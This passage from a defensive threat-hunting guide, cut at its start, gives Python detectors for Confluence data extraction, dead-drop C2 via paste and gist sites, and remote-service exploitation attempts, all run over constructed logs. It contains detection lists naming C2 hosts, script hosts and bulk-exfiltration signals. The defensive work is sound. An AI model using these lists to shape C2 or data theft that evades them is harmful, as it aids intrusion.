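def max_in_window(stamps: list, window: int) -> int:
    """Largest number of timestamps falling inside any span of `window` seconds."""
    stamps = sorted(stamps)
    best = 0
    for i, t in enumerate(stamps):
        j = bisect.bisect_right(stamps, t + window)
        best = max(best, j - i)
    return best


def analyse(records: list) -> dict:
    """Per-user sorted reasons for Confluence access worth a closer look."""
    per_user = defaultdict(list)
    for r in records:
        if is_confluence(r["url"]):
            per_user[r["user"]].append(r)
    out = {}
    for user, rows in per_user.items():
        reasons = set()
        stamps = [r["ts"] for r in rows]
        paths = [urlsplit(r["url"]).path for r in rows]
        if max_in_window(stamps, WINDOW_SECONDS) >= BULK_REQUESTS:
            reasons.add("bulk-page-access")
        if any(p.startswith(API_PATHS) for p in paths):
            reasons.add("api-extraction")
        if sum(p.startswith(ATTACHMENT_PATH) for p in paths) >= BULK_ATTACHMENTS:
            reasons.add("bulk-attachment-download")
        if sum(r.get("bytes_out", 0) for r in rows) >= LARGE_TRANSFER_BYTES:
            reasons.add("large-transfer")
        if any(r.get("user_agent", "").startswith(SCRIPT_UA_PREFIXES) for r in rows):
            reasons.add("scripted-access")
        # ts is seconds since local midnight in this constructed sample.
        if any((r["ts"] // 3600) % 24 not in BUSINESS_HOURS for r in rows):
            reasons.add("off-hours-access")
        if reasons:
            out[user] = sorted(reasons)
    return out


# Constructed sample: alice reads three pages at 09:00; svc-export pulls 60 REST
# content pages and 12 attachments at 02:00 with a python client, about 156 MB in total.
SAMPLE_RECORDS = [
    {"user": "alice", "ts": 9 * 3600 + 60 * k, "method": "GET", "bytes_out": 50_000,
     "url": f"https://confluence.example.invalid/display/ENG/Page{k}",
     "user_agent": "Mozilla/5.0 (Windows NT 10.0)"}
    for k in range(3)
] + [
    {"user": "svc-export", "ts": 2 * 3600 + 5 * k, "method": "GET", "bytes_out": 2_000_000,
     "url": f"https://confluence.example.invalid/rest/api/content?start={k * 25}&limit=25",
     "user_agent": "python-requests/2.31"}
    for k in range(60)
] + [
    {"user": "svc-export", "ts": 2 * 3600 + 400 + 5 * k, "method": "GET", "bytes_out": 3_000_000,
     "url": f"https://confluence.example.invalid/download/attachments/1234/file{k}.pdf",
     "user_agent": "python-requests/2.31"}
    for k in range(12)
]

if __name__ == "__main__":
    print(analyse(SAMPLE_RECORDS))
```

A service account paging through the REST API is not in itself wrong (backups and search indexers do exactly this), which is why the result is a set of reasons rather than a verdict: an approved exporter should be listed in an allowlist before the rule is alerted on, and a new account that trips all six at once is the case worth a ticket.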
7. T1102.001 - Web Service: Dead Drop Resolver
Objective: Detect and investigate the use of dead drop resolvers (e.g., pastebin or GitHub) for C2 communication.
Detect Access to Known Dead Drop Sites
Purpose: Identify access to dead drop sites commonly used for C2 communication.
Monitor for Suspicious Pastebin or GitHub Gist Access
Purpose: Detect suspicious GET or POST requests to pastebin or GitHub Gists that may be used for C2.
Identify Access to Newly Created Pastes or Gists
Purpose: Monitor for access to newly created pastes or gists, which could be used as dead drops.
Detect Unusual Traffic to Dead Drop Sites
Purpose: Identify repeated or unusual access to dead drop sites that may indicate C2 activity.
Monitor for Use of PowerShell to Access Dead Drop Sites
Purpose: Detect PowerShell scripts accessing dead drop sites for C2 communication.
Identify Download of C2 Instructions from Dead Drop Sites
Purpose: Monitor for downloads of C2 instructions from dead drop sites.
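The dead drop checks above separate into a host match, a question of which process made the request, whether raw content (as opposed to a rendered page) was fetched, and how often the same URL is pulled. The worked example below is an added one, not code from the page: the network records mirror DeviceNetworkEvents fields (device, timestamp, initiating process, remote URL) but are constructed, the paste identifier in the sample URL is a placeholder, the host list names well-known public paste and gist services, and the browser and script-host lists are a constructed baseline. The "newly created paste" item is not covered, as it needs the paste service's API rather than the network log.

```python
"""Dead drop resolver detection over constructed network event records.
Added example: records mirror DeviceNetworkEvents fields but are constructed; the host
list names well-known public paste/gist services and the process lists are a baseline."""
from collections import Counter, defaultdict
from urllib.parse import urlsplit

DEAD_DROP_HOSTS = {"pastebin.com", "gist.github.com", "gist.githubusercontent.com",
                   "raw.githubusercontent.com"}
# Markers that the request fetched raw text rather than a rendered, human-readable page.
RAW_MARKERS = ("/raw/", "raw.githubusercontent.com", "gist.githubusercontent.com")
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe", "rundll32.exe"}
REPEAT_THRESHOLD = 5   # fetches of the same URL by one device


def parse(url: str):
    parts = urlsplit(url)
    return (parts.hostname or "").lower(), parts.path


def flag_event(ev: dict) -> list:
    """Reasons one request to a dead drop host is suspicious, in a fixed order."""
    host, path = parse(ev["url"])
    if host not in DEAD_DROP_HOSTS:
        return []
    reasons = ["dead-drop-host"]
    proc = ev["process"].lower()
    if proc not in BROWSERS:
        reasons.append(f"non-browser:{proc}")
    if proc in SCRIPT_HOSTS:
        reasons.append("script-host-access")
    if any(m in host or m in path for m in RAW_MARKERS):
        reasons.append("raw-content-fetch")
    return reasons


def repeated_fetches(events: list) -> dict:
    """(device, url) pairs fetched at least REPEAT_THRESHOLD times: an implant polling a
    dead drop for new instructions, rather than a person reading a page once."""
    counts = Counter((ev["device"], ev["url"]) for ev in events
                     if parse(ev["url"])[0] in DEAD_DROP_HOSTS)
    return {k: n for k, n in counts.items() if n >= REPEAT_THRESHOLD}


def hunt(events: list) -> dict:
    """Per-device sorted list of unique reasons, including repeat counts."""
    out = defaultdict(set)
    for ev in events:
        out[ev["device"]].update(flag_event(ev))
    for (device, url), n in repeated_fetches(events).items():
        out[device].add(f"repeated-fetch:{n}")
    return {d: sorted(r) for d, r in out.items() if r}


# Constructed sample: ws01's PowerShell pulls the same raw paste (placeholder id) every
# five minutes; ws02's browser opens one gist page and an intranet site.
SAMPLE_EVENTS = [
    {"device": "ws01", "ts": 300 * i, "process": "powershell.exe",
     "url": "https://pastebin.com/raw/PLACEHOLDER1"}
    for i in range(6)
] + [
    {"device": "ws02", "ts": 100, "process": "chrome.exe", "url": "https://gist.github.com/someone/abc123"},
    {"device": "ws02", "ts": 200, "process": "chrome.exe", "url": "https://intranet.example.invalid/"},
]

if __name__ == "__main__":
    print(hunt(SAMPLE_EVENTS))
```

A single browser visit to a gist is normal developer traffic and yields only the host match; the combination of a script host, a raw URL and a repeating fetch is what turns it into a C2 lead worth pivoting from (what did that PowerShell process spawn, and what did it connect to next).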
8. T1210 - Exploitation of Remote Services
Objective: Detect and investigate the exploitation of remote services to establish C2 channels.
Detect Exploitation Attempts via RDP
Purpose: Identify failed RDP logon attempts that may indicate exploitation attempts.
Monitor for Exploitation of SSH
Purpose: Detect SSH connection attempts that are denied, which may indicate exploitation attempts.
Identify Suspicious SMB Activity
Purpose: Monitor for suspicious SMB activity, such as repeated access denied events.
Detect Exploitation of Web Services
Purpose: Identify web exploitation attempts using HTTP POST requests.
Monitor for Vulnerability Scanning Activity
Purpose: Detect vulnerability scanning activity that may precede exploitation attempts.
Identify Exploitation of Remote Services via PowerShell
Purpose: Monitor for PowerShell commands attempting to exploit remote services.
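Each T1210 item above is a burst or fan-out count: failed logons per source and service (for RDP that is Windows event 4625 with logon type 10; for SSH the "Failed password" lines in auth.log), distinct ports per source and target, error responses per web client, and hosts reached by one PowerShell process on RPC/SMB/WinRM ports. The worked example below is an added one, not code from the page: all four record sets are constructed with documentation-range addresses, and every threshold and window is illustrative.

```python
"""Exploitation-attempt heuristics over constructed authentication, web and network
records. Added example: the records are constructed; the service labels match the
page's RDP / SSH / SMB / web cases and the thresholds are illustrative."""
import bisect
from collections import defaultdict

WINDOW = 300                # seconds
FAILED_LOGON_THRESHOLD = 20 # failures from one source to one service inside WINDOW
PORT_SCAN_THRESHOLD = 15    # distinct destination ports from one source to one host
WEB_ERROR_THRESHOLD = 25    # 4xx/5xx responses returned to one source inside WINDOW
FANOUT_THRESHOLD = 10       # distinct hosts reached by one PowerShell process on admin ports
ADMIN_PORTS = {135, 445, 5985, 5986}  # RPC endpoint mapper, SMB, WinRM HTTP/HTTPS


def max_in_window(stamps, window=WINDOW) -> int:
    """Largest number of timestamps inside any span of `window` seconds."""
    stamps = sorted(stamps)
    return max((bisect.bisect_right(stamps, t + window) - i for i, t in enumerate(stamps)), default=0)


def failed_logon_bursts(auth_events) -> dict:
    """{(src_ip, service): peak failures in WINDOW} for sources over the threshold.
    Records: {"ts", "src_ip", "service": "rdp"|"ssh"|"smb", "outcome": "failure"|"success"}."""
    per = defaultdict(list)
    for ev in auth_events:
        if ev["outcome"] == "failure":
            per[(ev["src_ip"], ev["service"])].append(ev["ts"])
    out = {}
    for key, stamps in per.items():
        peak = max_in_window(stamps)
        if peak >= FAILED_LOGON_THRESHOLD:
            out[key] = peak
    return out


def port_scans(net_events) -> dict:
    """{(src_ip, dst_ip): distinct ports} where one source probes many ports on one host."""
    per = defaultdict(set)
    for ev in net_events:
        per[(ev["src_ip"], ev["dst_ip"])].add(ev["dst_port"])
    return {k: len(p) for k, p in per.items() if len(p) >= PORT_SCAN_THRESHOLD}


def web_probes(web_events) -> dict:
    """{src_ip: (peak errors in WINDOW, distinct paths)}: a burst of error responses across
    many paths is the footprint of a scanner trying known endpoints, not of a user."""
    stamps = defaultdict(list)
    paths = defaultdict(set)
    for ev in web_events:
        if ev["status"] >= 400:
            stamps[ev["src_ip"]].append(ev["ts"])
            paths[ev["src_ip"]].add(ev["path"])
    out = {}
    for ip, s in stamps.items():
        peak = max_in_window(s)
        if peak >= WEB_ERROR_THRESHOLD:
            out[ip] = (peak, len(paths[ip]))
    return out


def powershell_fanout(proc_net_events) -> dict:
    """{(device, pid): distinct hosts} for PowerShell processes reaching many hosts on
    RPC/SMB/WinRM ports, the shape of scripted remote-service probing from one host."""
    per = defaultdict(set)
    for ev in proc_net_events:
        if ev["process"].lower() in ("powershell.exe", "pwsh.exe") and ev["dst_port"] in ADMIN_PORTS:
            per[(ev["device"], ev["pid"])].add(ev["dst_ip"])
    return {k: len(h) for k, h in per.items() if len(h) >= FANOUT_THRESHOLD}


# Constructed samples, documentation-range addresses throughout.
SAMPLE_AUTH = [
    {"ts": 10 * i, "src_ip": "203.0.113.5", "service": "rdp", "outcome": "failure"} for i in range(30)
] + [
    {"ts": 50, "src_ip": "10.0.0.2", "service": "rdp", "outcome": "failure"},
    {"ts": 60, "src_ip": "10.0.0.2", "service": "rdp", "outcome": "success"},
]
SAMPLE_NET = [
    {"ts": i, "src_ip": "198.51.100.7", "dst_ip": "10.0.0.10", "dst_port": 1 + i} for i in range(40)
] + [{"ts": 5, "src_ip": "10.0.0.2", "dst_ip": "10.0.0.10", "dst_port": 445}]
SAMPLE_WEB = [
    {"ts": 2 * i, "src_ip": "198.51.100.9", "path": f"/probe{i}", "status": 404} for i in range(30)
] + [{"ts": 3, "src_ip": "10.0.0.2", "path": "/index.html", "status": 200}]
SAMPLE_PROC_NET = [
    {"device": "ws01", "pid": 4242, "process": "powershell.exe", "dst_ip": f"10.0.1.{n}", "dst_port": 445}
    for n in range(1, 13)
] + [{"device": "ws02", "pid": 77, "process": "powershell.exe", "dst_ip": "10.0.1.1", "dst_port": 5985}]

if __name__ == "__main__":
    print(failed_logon_bursts(SAMPLE_AUTH), port_scans(SAMPLE_NET))
    print(web_probes(SAMPLE_WEB), powershell_fanout(SAMPLE_PROC_NET))
```

The single mistyped password from 10.0.0.2 followed by a success is the benign case every one of these rules must ignore; the thresholds are what keep the help-desk noise out, and they should be set from a week of baseline data rather than copied from here.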